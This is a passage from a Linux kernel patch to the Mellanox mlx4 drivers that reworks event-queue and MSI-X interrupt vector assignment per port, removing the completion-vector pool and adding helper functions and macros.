<= dev->caps.num_comp_vectors) - continue; + for (i = 0; i < total_eqs; i++) mlx4_release_eq(dev, ibdev->eq_table[i]); - } kfree(ibdev->eq_table); + ibdev->eq_table = NULL; } static 
void *mlx4_ib_add(struct mlx4_dev *dev) diff --git a/drivers/infiniband/hw/mlx4/mlx4_ib.h b/drivers/infiniband/hw/mlx4/mlx4_ib.h index fce3934372a1..ef80e6c99a68 100644 --- a/drivers/infiniband/hw/mlx4/mlx4_ib.h +++ b/drivers/infiniband/hw/mlx4/mlx4_ib.h @@ -523,7 +523,6 @@ struct mlx4_ib_dev { struct mlx4_ib_iboe iboe; int counters[MLX4_MAX_PORTS]; int *eq_table; - int eq_added; struct kobject *iov_parent; struct kobject *ports_parent; struct kobject *dev_ports_parent[MLX4_MFUNC_MAX]; diff --git a/drivers/net/ethernet/mellanox/mlx4/cq.c b/drivers/net/ethernet/mellanox/mlx4/cq.c index e71f31387ac6..7431cd4d7390 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/cq.c @@ -292,7 +292,7 @@ int mlx4_cq_alloc(struct mlx4_dev *dev, int nent, u64 mtt_addr; int err; - if (vector > dev->caps.num_comp_vectors + dev->caps.comp_pool) + if (vector >= dev->caps.num_comp_vectors) return -EINVAL; cq->vector = vector; @@ -319,7 +319,7 @@ int mlx4_cq_alloc(struct mlx4_dev *dev, int nent, cq_context->flags |= cpu_to_be32(1 << 19); cq_context->logsize_usrpage = cpu_to_be32((ilog2(nent) << 24) | uar->index); - cq_context->comp_eqn = priv->eq_table.eq[vector].eqn; + cq_context->comp_eqn = priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(vector)].eqn; cq_context->log_page_size = mtt->page_shift - MLX4_ICM_PAGE_SHIFT; mtt_addr = mlx4_mtt_addr(dev, mtt); @@ -339,11 +339,11 @@ int mlx4_cq_alloc(struct mlx4_dev *dev, int nent, init_completion(&cq->free); cq->comp = mlx4_add_cq_to_tasklet; cq->tasklet_ctx.priv = - &priv->eq_table.eq[cq->vector].tasklet_ctx; + &priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(vector)].tasklet_ctx; INIT_LIST_HEAD(&cq->tasklet_ctx.list); - cq->irq = priv->eq_table.eq[cq->vector].irq; + cq->irq = priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(vector)].irq; return 0; err_radix: @@ -368,7 +368,7 @@ void mlx4_cq_free(struct mlx4_dev *dev, struct mlx4_cq *cq) if (err) mlx4_warn(dev, "HW2SW_CQ failed (%d) for CQN %06x\n", err, cq->cqn); - synchronize_irq(priv->eq_table.eq[cq->vector].irq); + synchronize_irq(priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq->vector)].irq); spin_lock_irq(&cq_table->lock); radix_tree_delete(&cq_table->tree, cq->cqn); diff --git a/drivers/net/ethernet/mellanox/mlx4/en_cq.c b/drivers/net/ethernet/mellanox/mlx4/en_cq.c index 22da4d0d0f05..d71c567eb076 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_cq.c @@ -66,6 +66,7 @@ int mlx4_en_create_cq(struct mlx4_en_priv *priv, cq->ring = ring; cq->is_tx = mode; + cq->vector = mdev->dev->caps.num_comp_vectors; /* Allocate HW buffers on provided NUMA node. * dev->numa_node is used in mtt range allocation flow. 
@@ -101,12 +102,7 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, int err = 0; char name[25]; int timestamp_en = 0; - struct cpu_rmap *rmap = -#ifdef CONFIG_RFS_ACCEL - priv->dev->rx_cpu_rmap; -#else - NULL; -#endif + bool assigned_eq = false; cq->dev = mdev->pndev[priv->port]; cq->mcq.set_ci_db = cq->wqres.db.db; @@ -116,23 +112,19 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, memset(cq->buf, 0, cq->buf_size); if (cq->is_tx == RX) { - if (mdev->dev->caps.comp_pool) { - if (!cq->vector) { - sprintf(name, "%s-%d", priv->dev->name, - cq->ring); - /* Set IRQ for specific name (per ring) */ - if (mlx4_assign_eq(mdev->dev, name, rmap, - &cq->vector)) { - cq->vector = (cq->ring + 1 + priv->port) - % mdev->dev->caps.num_comp_vectors; - mlx4_warn(mdev, "Failed assigning an EQ to %s, falling back to legacy EQ's\n", - name); - } - + if (!mlx4_is_eq_vector_valid(mdev->dev, priv->port, + cq->vector)) { + cq->vector = cq_idx; + + err = mlx4_assign_eq(mdev->dev, priv->port, + &cq->vector); + if (err) { + mlx4_err(mdev, "Failed assigning an EQ to %s\n", + name); + goto free_eq; } - } else { - cq->vector = (cq->ring + 1 + priv->port) % - mdev->dev->caps.num_comp_vectors; + + assigned_eq = true; } cq->irq_desc = @@ -159,7 +151,7 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, &mdev->priv_uar, cq->wqres.db.dma, &cq->mcq, cq->vector, 0, timestamp_en); if (err) - return err; + goto free_eq; cq->mcq.comp = cq->is_tx ? mlx4_en_tx_irq : mlx4_en_rx_irq; cq->mcq.event = mlx4_en_cq_event; @@ -182,6 +174,12 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, napi_enable(&cq->napi); return 0; + +free_eq: + if (assigned_eq) + mlx4_release_eq(mdev->dev, cq->vector); + cq->vector = mdev->dev->caps.num_comp_vectors; + return err; } void mlx4_en_destroy_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq **pcq) @@ -191,9 +189,9 @@ void mlx4_en_destroy_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq **pcq) mlx4_en_unmap_buffer(&cq->wqres.buf); mlx4_free_hwq_res(mdev->dev, &cq->wqres, cq->buf_size); - if (priv->mdev->dev->caps.comp_pool && cq->vector) { + if (mlx4_is_eq_vector_valid(mdev->dev, priv->port, cq->vector) && + cq->is_tx == RX) mlx4_release_eq(priv->mdev->dev, cq->vector); - } cq->vector = 0; cq->buf_size = 0; cq->buf = NULL; diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c index 32f5ec737472..455cecae5aa4 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c @@ -1958,7 +1958,6 @@ void mlx4_en_free_resources(struct mlx4_en_priv *priv) int i; #ifdef CONFIG_RFS_ACCEL - free_irq_cpu_rmap(priv->dev->rx_cpu_rmap); priv->dev->rx_cpu_rmap = NULL; #endif @@ -2016,11 +2015,7 @@ int mlx4_en_alloc_resources(struct mlx4_en_priv *priv) } #ifdef CONFIG_RFS_ACCEL - if (priv->mdev->dev->caps.comp_pool) { - priv->dev->rx_cpu_rmap = alloc_irq_cpu_rmap(priv->mdev->dev->caps.comp_pool); - if (!priv->dev->rx_cpu_rmap) - goto err; - } + priv->dev->rx_cpu_rmap = mlx4_get_cpu_rmap(priv->mdev->dev, priv->port); #endif return 0; diff --git a/drivers/net/ethernet/mellanox/mlx4/en_rx.c b/drivers/net/ethernet/mellanox/mlx4/en_rx.c index 2a77a6b19121..35f726c17e48 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_rx.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_rx.c @@ -337,15 +337,10 @@ void mlx4_en_set_num_rx_rings(struct mlx4_en_dev *mdev) struct mlx4_dev *dev = mdev->dev; mlx4_foreach_port(i, dev, 
MLX4_PORT_TYPE_ETH) { - if (!dev->caps.comp_pool) - num_of_eqs = max_t(int, MIN_RX_RINGS, - min_t(int, - dev->caps.num_comp_vectors, - DEF_RX_RINGS)); - else - num_of_eqs = min_t(int, MAX_MSIX_P_PORT, - dev->caps.comp_pool/ - dev->caps.num_ports) - 1; + num_of_eqs = max_t(int, MIN_RX_RINGS, + min_t(int, + mlx4_get_eqs_per_port(mdev->dev, i), + DEF_RX_RINGS)); num_rx_rings = mlx4_low_memory_profile() ? MIN_RX_RINGS : min_t(int, num_of_eqs, diff --git a/drivers/net/ethernet/mellanox/mlx4/eq.c b/drivers/net/ethernet/mellanox/mlx4/eq.c index 80bcd648c5e0..2e6fc6a860a7 100644 --- a/drivers/net/ethernet/mellanox/mlx4/eq.c +++ b/drivers/net/ethernet/mellanox/mlx4/eq.c @@ -895,8 +895,8 @@ static int mlx4_num_eq_uar(struct mlx4_dev *dev) * we need to map, take the difference of highest index and * the lowest index we'll use and add 1. */ - return (dev->caps.num_comp_vectors + 1 + dev->caps.reserved_eqs + - dev->caps.comp_pool)/4 - dev->caps.reserved_eqs/4 + 1; + return (dev->caps.num_comp_vectors + 1 + dev->caps.reserved_eqs) / 4 - + dev->caps.reserved_eqs / 4 + 1; } static void __iomem *mlx4_get_eq_uar(struct mlx4_dev *dev, struct mlx4_eq *eq) @@ -1085,8 +1085,7 @@ static void mlx4_free_eq(struct mlx4_dev *dev, static void mlx4_free_irqs(struct mlx4_dev *dev) { struct mlx4_eq_table *eq_table = &mlx4_priv(dev)->eq_table; - struct mlx4_priv *priv = mlx4_priv(dev); - int i, vec; + int i; if (eq_table->have_irq) free_irq(dev->persist->pdev->irq, dev); @@ -1097,20 +1096,6 @@ static void mlx4_free_irqs(struct mlx4_dev *dev) eq_table->eq[i].have_irq = 0; } - for (i = 0; i < dev->caps.comp_pool; i++) { - /* - * Freeing the assigned irq's - * all bits should be 0, but we need to validate - */ - if (priv->msix_ctl.pool_bm & 1ULL << i) { - /* NO need protecting*/ - vec = dev->caps.num_comp_vectors + 1 + i; - free_irq(priv->eq_table.eq[vec].irq, - &priv->eq_table.eq[vec]); - } - } - - kfree(eq_table->irq_names); } @@ -1191,76 +1176,73 @@ int mlx4_init_eq_table(struct mlx4_dev *dev) } priv->eq_table.irq_names = - kmalloc(MLX4_IRQNAME_SIZE * (dev->caps.num_comp_vectors + 1 + - dev->caps.comp_pool), + kmalloc(MLX4_IRQNAME_SIZE * (dev->caps.num_comp_vectors + 1), GFP_KERNEL); if (!priv->eq_table.irq_names) { err = -ENOMEM; - goto err_out_bitmap; + goto err_out_clr_int; } - for (i = 0; i < dev->caps.num_comp_vectors; ++i) { - err = mlx4_create_eq(dev, dev->caps.num_cqs - - dev->caps.reserved_cqs + - MLX4_NUM_SPARE_EQE, - (dev->flags & MLX4_FLAG_MSI_X) ? i : 0, - &priv->eq_table.eq[i]); - if (err) { - --i; - goto err_out_unmap; - } - } - - err = mlx4_create_eq(dev, MLX4_NUM_ASYNC_EQE + MLX4_NUM_SPARE_EQE, - (dev->flags & MLX4_FLAG_MSI_X) ? 
dev->caps.num_comp_vectors : 0, - &priv->eq_table.eq[dev->caps.num_comp_vectors]); - if (err) - goto err_out_comp; - - /*if additional completion vectors poolsize is 0 this loop will not run*/ - for (i = dev->caps.num_comp_vectors + 1; - i < dev->caps.num_comp_vectors + dev->caps.comp_pool + 1; ++i) { + for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) { + if (i == MLX4_EQ_ASYNC) { + err = mlx4_create_eq(dev, + MLX4_NUM_ASYNC_EQE + MLX4_NUM_SPARE_EQE, + 0, &priv->eq_table.eq[MLX4_EQ_ASYNC]); + } else { +#ifdef CONFIG_RFS_ACCEL + struct mlx4_eq *eq = &priv->eq_table.eq[i]; + int port = find_first_bit(eq->actv_ports.ports, + dev->caps.num_ports) + 1; + + if (port <= dev->caps.num_ports) { + struct mlx4_port_info *info = + &mlx4_priv(dev)->port[port]; + + if (!info->rmap) { + info->rmap = alloc_irq_cpu_rmap( + mlx4_get_eqs_per_port(dev, port)); + if (!info->rmap) { + mlx4_warn(dev, "Failed to allocate cpu rmap\n"); + err = -ENOMEM; + goto err_out_unmap; + } + } - err = mlx4_create_eq(dev, dev->caps.num_cqs - - dev->caps.reserved_cqs + - MLX4_NUM_SPARE_EQE, - (dev->flags & MLX4_FLAG_MSI_X) ? i : 0, - &priv->eq_table.eq[i]); - if (err) { - --i; - goto err_out_unmap; + err = irq_cpu_rmap_add( + info->rmap, eq->irq); + if (err) + mlx4_warn(dev, "Failed adding irq rmap\n"); + } +#endif + err = mlx4_create_eq(dev, dev->caps.num_cqs - + dev->caps.reserved_cqs + + MLX4_NUM_SPARE_EQE, + (dev->flags & MLX4_FLAG_MSI_X) ? + i + 1 - !!(i > MLX4_EQ_ASYNC) : 0, + eq); } + if (err) + goto err_out_unmap; } - if (dev->flags & MLX4_FLAG_MSI_X) { const char *eq_name; - for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) { - if (i < dev->caps.num_comp_vectors) { - snprintf(priv->eq_table.irq_names + - i * MLX4_IRQNAME_SIZE, - MLX4_IRQNAME_SIZE, - "mlx4-comp-%d@pci:%s", i, - pci_name(dev->persist->pdev)); - } else { - snprintf(priv->eq_table.irq_names + - i * MLX4_IRQNAME_SIZE, - MLX4_IRQNAME_SIZE, - "mlx4-async@pci:%s", - pci_name(dev->persist->pdev)); - } + snprintf(priv->eq_table.irq_names + + MLX4_EQ_ASYNC * MLX4_IRQNAME_SIZE, + MLX4_IRQNAME_SIZE, + "mlx4-async@pci:%s", + pci_name(dev->persist->pdev)); + eq_name = priv->eq_table.irq_names + + MLX4_EQ_ASYNC * MLX4_IRQNAME_SIZE; - eq_name = priv->eq_table.irq_names + - i * MLX4_IRQNAME_SIZE; - err = request_irq(priv->eq_table.eq[i].irq, - mlx4_msi_x_interrupt, 0, eq_name, - priv->eq_table.eq + i); - if (err) - goto err_out_async; + err = request_irq(priv->eq_table.eq[MLX4_EQ_ASYNC].irq, + mlx4_msi_x_interrupt, 0, eq_name, + priv->eq_table.eq + MLX4_EQ_ASYNC); + if (err) + goto err_out_unmap; - priv->eq_table.eq[i].have_irq = 1; - } + priv->eq_table.eq[MLX4_EQ_ASYNC].have_irq = 1; } else { snprintf(priv->eq_table.irq_names, MLX4_IRQNAME_SIZE, @@ -1269,36 +1251,38 @@ int mlx4_init_eq_table(struct mlx4_dev *dev) err = request_irq(dev->persist->pdev->irq, mlx4_interrupt, IRQF_SHARED, priv->eq_table.irq_names, dev); if (err) - goto err_out_async; + goto err_out_unmap; priv->eq_table.have_irq = 1; } err = mlx4_MAP_EQ(dev, get_async_ev_mask(dev), 0, - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn); if (err) mlx4_warn(dev, "MAP_EQ for async EQ %d failed (%d)\n", - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn, err); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn, err); - for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) - eq_set_ci(&priv->eq_table.eq[i], 1); + /* arm ASYNC eq */ + eq_set_ci(&priv->eq_table.eq[MLX4_EQ_ASYNC], 1); return 0; -err_out_async: - mlx4_free_eq(dev, &priv->eq_table.eq[dev->caps.num_comp_vectors]); 
- -err_out_comp: - i = dev->caps.num_comp_vectors - 1; - err_out_unmap: - while (i >= 0) { - mlx4_free_eq(dev, &priv->eq_table.eq[i]); - --i; + while (i >= 0) + mlx4_free_eq(dev, &priv->eq_table.eq[i--]); +#ifdef CONFIG_RFS_ACCEL + for (i = 1; i <= dev->caps.num_ports; i++) { + if (mlx4_priv(dev)->port[i].rmap) { + free_irq_cpu_rmap(mlx4_priv(dev)->port[i].rmap); + mlx4_priv(dev)->port[i].rmap = NULL; + } } +#endif + mlx4_free_irqs(dev); + +err_out_clr_int: if (!mlx4_is_slave(dev)) mlx4_unmap_clr_int(dev); - mlx4_free_irqs(dev); err_out_bitmap: mlx4_unmap_uar(dev); @@ -1316,11 +1300,19 @@ void mlx4_cleanup_eq_table(struct mlx4_dev *dev) int i; mlx4_MAP_EQ(dev, get_async_ev_mask(dev), 1, - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn); +#ifdef CONFIG_RFS_ACCEL + for (i = 1; i <= dev->caps.num_ports; i++) { + if (mlx4_priv(dev)->port[i].rmap) { + free_irq_cpu_rmap(mlx4_priv(dev)->port[i].rmap); + mlx4_priv(dev)->port[i].rmap = NULL; + } + } +#endif mlx4_free_irqs(dev); - for (i = 0; i < dev->caps.num_comp_vectors + dev->caps.comp_pool + 1; ++i) + for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) mlx4_free_eq(dev, &priv->eq_table.eq[i]); if (!mlx4_is_slave(dev)) @@ -1371,87 +1363,166 @@ int mlx4_test_interrupts(struct mlx4_dev *dev) /* Return to default */ mlx4_MAP_EQ(dev, get_async_ev_mask(dev), 0, - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn); return err; } EXPORT_SYMBOL(mlx4_test_interrupts); -int mlx4_assign_eq(struct mlx4_dev *dev, char *name, struct cpu_rmap *rmap, - int *vector) +bool mlx4_is_eq_vector_valid(struct mlx4_dev *dev, u8 port, int vector) { + struct mlx4_priv *priv = mlx4_priv(dev); + vector = MLX4_CQ_TO_EQ_VECTOR(vector); + if (vector < 0 || (vector >= dev->caps.num_comp_vectors + 1) || + (vector == MLX4_EQ_ASYNC)) + return false; + + return test_bit(port - 1, priv->eq_table.eq[vector].actv_ports.ports); +} +EXPORT_SYMBOL(mlx4_is_eq_vector_valid); + +u32 mlx4_get_eqs_per_port(struct mlx4_dev *dev, u8 port) +{ + struct mlx4_priv *priv = mlx4_priv(dev); + unsigned int i; + unsigned int sum = 0; + + for (i = 0; i < dev->caps.num_comp_vectors + 1; i++) + sum += !!test_bit(port - 1, + priv->eq_table.eq[i].actv_ports.ports); + + return sum; +} +EXPORT_SYMBOL(mlx4_get_eqs_per_port); + +int mlx4_is_eq_shared(struct mlx4_dev *dev, int vector) +{ + struct mlx4_priv *priv = mlx4_priv(dev); + + vector = MLX4_CQ_TO_EQ_VECTOR(vector); + if (vector <= 0 || (vector >= dev->caps.num_comp_vectors + 1)) + return -EINVAL; + + return !!(bitmap_weight(priv->eq_table.eq[vector].actv_ports.ports, + dev->caps.num_ports) > 1); +} +EXPORT_SYMBOL(mlx4_is_eq_shared); + +struct cpu_rmap *mlx4_get_cpu_rmap(struct mlx4_dev *dev, int port) +{ + return mlx4_priv(dev)->port[port].rmap; +} +EXPORT_SYMBOL(mlx4_get_cpu_rmap); + +int mlx4_assign_eq(struct mlx4_dev *dev, u8 port, int *vector) +{ struct mlx4_priv *priv = mlx4_priv(dev); - int vec = 0, err = 0, i; + int err = 0, i = 0; + u32 min_ref_count_val = (u32)-1; + int requested_vector = MLX4_CQ_TO_EQ_VECTOR(*vector); + int *prequested_vector = NULL; + mutex_lock(&priv->msix_ctl.pool_lock); - for (i = 0; !vec && i < dev->caps.comp_pool; i++) { - if (~priv->msix_ctl.pool_bm & 1ULL << i) { - priv->msix_ctl.pool_bm |= 1ULL << i; - vec = dev->caps.num_comp_vectors + 1 + i; - snprintf(priv->eq_table.irq_names + - vec * MLX4_IRQNAME_SIZE, - MLX4_IRQNAME_SIZE, "%s", name); -#ifdef CONFIG_RFS_ACCEL - if (rmap) { - err = irq_cpu_rmap_add(rmap, - 
priv->eq_table.eq[vec].irq); - if (err) - mlx4_warn(dev, "Failed adding irq rmap\n"); + if (requested_vector < (dev->caps.num_comp_vectors + 1) && + (requested_vector >= 0) && + (requested_vector != MLX4_EQ_ASYNC)) { + if (test_bit(port - 1, + priv->eq_table.eq[requested_vector].actv_ports.ports)) { + prequested_vector = &requested_vector; + } else { + struct mlx4_eq *eq; + + for (i = 1; i < port; + requested_vector += mlx4_get_eqs_per_port(dev, i++)) + ; + + eq = &priv->eq_table.eq[requested_vector]; + if (requested_vector < dev->caps.num_comp_vectors + 1 && + test_bit(port - 1, eq->actv_ports.ports)) { + prequested_vector = &requested_vector; } -#endif - err = request_irq(priv->eq_table.eq[vec].irq, - mlx4_msi_x_interrupt, 0, - &priv->eq_table.irq_names[vec<<5], - priv->eq_table.eq + vec); - if (err) { - /*zero out bit by fliping it*/ - priv->msix_ctl.pool_bm ^= 1 << i; - vec = 0; - continue; - /*we dont want to break here*/ + } + } + + if (!prequested_vector) { + requested_vector = -1; + for (i = 0; min_ref_count_val && i < dev->caps.num_comp_vectors + 1; + i++) { + struct mlx4_eq *eq = &priv->eq_table.eq[i]; + + if (min_ref_count_val > eq->ref_count && + test_bit(port - 1, eq->actv_ports.ports)) { + min_ref_count_val = eq->ref_count; + requested_vector = i; } + } - eq_set_ci(&priv->eq_table.eq[vec], 1); + if (requested_vector < 0) { + err = -ENOSPC; + goto err_unlock; } + + prequested_vector = &requested_vector; } + + if (!test_bit(*prequested_vector, priv->msix_ctl.pool_bm) && + dev->flags & MLX4_FLAG_MSI_X) { + set_bit(*prequested_vector, priv->msix_ctl.pool_bm); + snprintf(priv->eq_table.irq_names + + *prequested_vector * MLX4_IRQNAME_SIZE, + MLX4_IRQNAME_SIZE, "mlx4-%d@%s", + *prequested_vector, dev_name(&dev->persist->pdev->dev)); + + err = request_irq(priv->eq_table.eq[*prequested_vector].irq, + mlx4_msi_x_interrupt, 0, + &priv->eq_table.irq_names[*prequested_vector << 5], + priv->eq_table.eq + *prequested_vector); + + if (err) { + clear_bit(*prequested_vector, priv->msix_ctl.pool_bm); + *prequested_vector = -1; + } else { + eq_set_ci(&priv->eq_table.eq[*prequested_vector], 1); + priv->eq_table.eq[*prequested_vector].have_irq = 1; + } + } + + if (!err && *prequested_vector >= 0) + priv->eq_table.eq[*prequested_vector].ref_count++; + +err_unlock: mutex_unlock(&priv->msix_ctl.pool_lock); - if (vec) { - *vector = vec; - } else { + if (!err && *prequested_vector >= 0) + *vector = MLX4_EQ_TO_CQ_VECTOR(*prequested_vector); + else *vector = 0; - err = (i == dev->caps.comp_pool) ? 
-ENOSPC : err; - } + return err; } EXPORT_SYMBOL(mlx4_assign_eq); -int mlx4_eq_get_irq(struct mlx4_dev *dev, int vec) +int mlx4_eq_get_irq(struct mlx4_dev *dev, int cq_vec) { struct mlx4_priv *priv = mlx4_priv(dev); - return priv->eq_table.eq[vec].irq; + return priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq_vec)].irq; } EXPORT_SYMBOL(mlx4_eq_get_irq); void mlx4_release_eq(struct mlx4_dev *dev, int vec) { struct mlx4_priv *priv = mlx4_priv(dev); - /*bm index*/ - int i = vec - dev->caps.num_comp_vectors - 1; - - if (likely(i >= 0)) { - /*sanity check , making sure were not trying to free irq's - Belonging to a legacy EQ*/ - mutex_lock(&priv->msix_ctl.pool_lock); - if (priv->msix_ctl.pool_bm & 1ULL << i) { - free_irq(priv->eq_table.eq[vec].irq, - &priv->eq_table.eq[vec]); - priv->msix_ctl.pool_bm &= ~(1ULL << i); - } - mutex_unlock(&priv->msix_ctl.pool_lock); - } + int eq_vec = MLX4_CQ_TO_EQ_VECTOR(vec); + + mutex_lock(&priv->msix_ctl.pool_lock); + priv->eq_table.eq[eq_vec].ref_count--; + /* once we allocated EQ, we don't release it because it might be binded + * to cpu_rmap. + */ + mutex_unlock(&priv->msix_ctl.pool_lock); } EXPORT_SYMBOL(mlx4_release_eq); diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 70d33f6e2a41..3ec5113c5a33 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2364,11 +2364,11 @@ static int mlx4_setup_hca(struct mlx4_dev *dev) if (err) { if (dev->flags & MLX4_FLAG_MSI_X) { mlx4_warn(dev, "NOP command failed to generate MSI-X interrupt IRQ %d)\n", - priv->eq_table.eq[dev->caps.num_comp_vectors].irq); + priv->eq_table.eq[MLX4_EQ_ASYNC].irq); mlx4_warn(dev, "Trying again without MSI-X\n"); } else { mlx4_err(dev, "NOP command failed to generate interrupt (IRQ %d), aborting\n", - priv->eq_table.eq[dev->caps.num_comp_vectors].irq); + priv->eq_table.eq[MLX4_EQ_ASYNC].irq); mlx4_err(dev, "BIOS or ACPI interrupt routing problem?\n"); } @@ -2486,9 +2486,10 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) struct mlx4_priv *priv = mlx4_priv(dev); struct msix_entry *entries; int i; + int port = 0; if (msi_x) { - int nreq = dev->caps.num_ports * num_online_cpus() + MSIX_LEGACY_SZ; + int nreq = dev->caps.num_ports * num_online_cpus() + 1; nreq = min_t(int, dev->caps.num_eqs - dev->caps.reserved_eqs, nreq); @@ -2503,20 +2504,49 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) nreq = pci_enable_msix_range(dev->persist->pdev, entries, 2, nreq); - if (nreq < 0) { + if (nreq < 0 || nreq < MLX4_EQ_ASYNC) { kfree(entries); goto no_msi; - } else if (nreq < MSIX_LEGACY_SZ + - dev->caps.num_ports * MIN_MSIX_P_PORT) { - /*Working in legacy mode , all EQ's shared*/ - dev->caps.comp_pool = 0; - dev->caps.num_comp_vectors = nreq - 1; - } else { - dev->caps.comp_pool = nreq - MSIX_LEGACY_SZ; - dev->caps.num_comp_vectors = MSIX_LEGACY_SZ - 1; } - for (i = 0; i < nreq; ++i) - priv->eq_table.eq[i].irq = entries[i].vector; + /* 1 is reserved for events (asyncrounous EQ) */ + dev->caps.num_comp_vectors = nreq - 1; + + priv->eq_table.eq[MLX4_EQ_ASYNC].irq = entries[0].vector; + bitmap_zero(priv->eq_table.eq[MLX4_EQ_ASYNC].actv_ports.ports, + dev->caps.num_ports); + + for (i = 0; i < dev->caps.num_comp_vectors + 1; i++) { + if (i == MLX4_EQ_ASYNC) + continue; + + priv->eq_table.eq[i].irq = + entries[i + 1 - !!(i > MLX4_EQ_ASYNC)].vector; + + if (MLX4_IS_LEGACY_EQ_MODE(dev->caps)) { + bitmap_fill(priv->eq_table.eq[i].actv_ports.ports, + dev->caps.num_ports); + } else { + set_bit(port, + 
priv->eq_table.eq[i].actv_ports.ports); + } + /* We divide the Eqs evenly between the two ports. + * (dev->caps.num_comp_vectors / dev->caps.num_ports) + * refers to the number of Eqs per port + * (i.e eqs_per_port). Theoretically, we would like to + * write something like (i + 1) % eqs_per_port == 0. + * However, since there's an asynchronous Eq, we have + * to skip over it by comparing this condition to + * !!((i + 1) > MLX4_EQ_ASYNC). + */ + if ((dev->caps.num_comp_vectors > dev->caps.num_ports) && + ((i + 1) % + (dev->caps.num_comp_vectors / dev->caps.num_ports)) == + !!((i + 1) > MLX4_EQ_ASYNC)) + /* If dev->caps.num_comp_vectors < dev->caps.num_ports, + * everything is shared anyway. + */ + port++; + } dev->flags |= MLX4_FLAG_MSI_X; @@ -2526,10 +2556,15 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) no_msi: dev->caps.num_comp_vectors = 1; - dev->caps.comp_pool = 0; - for (i = 0; i < 2; ++i) + BUG_ON(MLX4_EQ_ASYNC >= 2); + for (i = 0; i < 2; ++i) { priv->eq_table.eq[i].irq = dev->persist->pdev->irq; + if (i != MLX4_EQ_ASYNC) { + bitmap_fill(priv->eq_table.eq[i].actv_ports.ports, + dev->caps.num_ports); + } + } } static int mlx4_init_port_info(struct mlx4_dev *dev, int port) @@ -2594,6 +2629,10 @@ static void mlx4_cleanup_port_info(struct mlx4_port_info *info) device_remove_file(&info->dev->persist->pdev->dev, &info->port_attr); device_remove_file(&info->dev->persist->pdev->dev, &info->port_mtu_attr); +#ifdef CONFIG_RFS_ACCEL + free_irq_cpu_rmap(info->rmap); + info->rmap = NULL; +#endif } static int mlx4_init_steering(struct mlx4_dev *dev) @@ -3024,7 +3063,7 @@ static int mlx4_load_one(struct pci_dev *pdev, int pci_dev_data, if (err) goto err_master_mfunc; - priv->msix_ctl.pool_bm = 0; + bitmap_zero(priv->msix_ctl.pool_bm, MAX_MSIX); mutex_init(&priv->msix_ctl.pool_lock); mlx4_enable_msi_x(dev); @@ -3046,7 +3085,6 @@ static int mlx4_load_one(struct pci_dev *pdev, int pci_dev_data, !mlx4_is_mfunc(dev)) { dev->flags &= ~MLX4_FLAG_MSI_X; dev->caps.num_comp_vectors = 1; - dev->caps.comp_pool = 0; pci_disable_msix(pdev); err = mlx4_setup_hca(dev); } diff --git a/drivers/net/ethernet/mellanox/mlx4/mlx4.h b/drivers/net/ethernet/mellanox/mlx4/mlx4.h index 502d3dd2c888..ff40098eaf4c 100644 --- a/drivers/net/ethernet/mellanox/mlx4/mlx4.h +++ b/drivers/net/ethernet/mellanox/mlx4/mlx4.h @@ -287,6 +287,12 @@ struct mlx4_icm_table { #define MLX4_CQE_SIZE_MASK_STRIDE 0x3 #define MLX4_EQE_SIZE_MASK_STRIDE 0x30 +#define MLX4_EQ_ASYNC 0 +#define MLX4_EQ_TO_CQ_VECTOR(vector) ((vector) - \ + !!((int)(vector) >= MLX4_EQ_ASYNC)) +#define MLX4_CQ_TO_EQ_VECTOR(vector) ((vector) + \ + !!((int)(vector) >= MLX4_EQ_ASYNC)) + /* * Must be packed because mtt_seg is 64 bits but only aligned to 32 bits. 
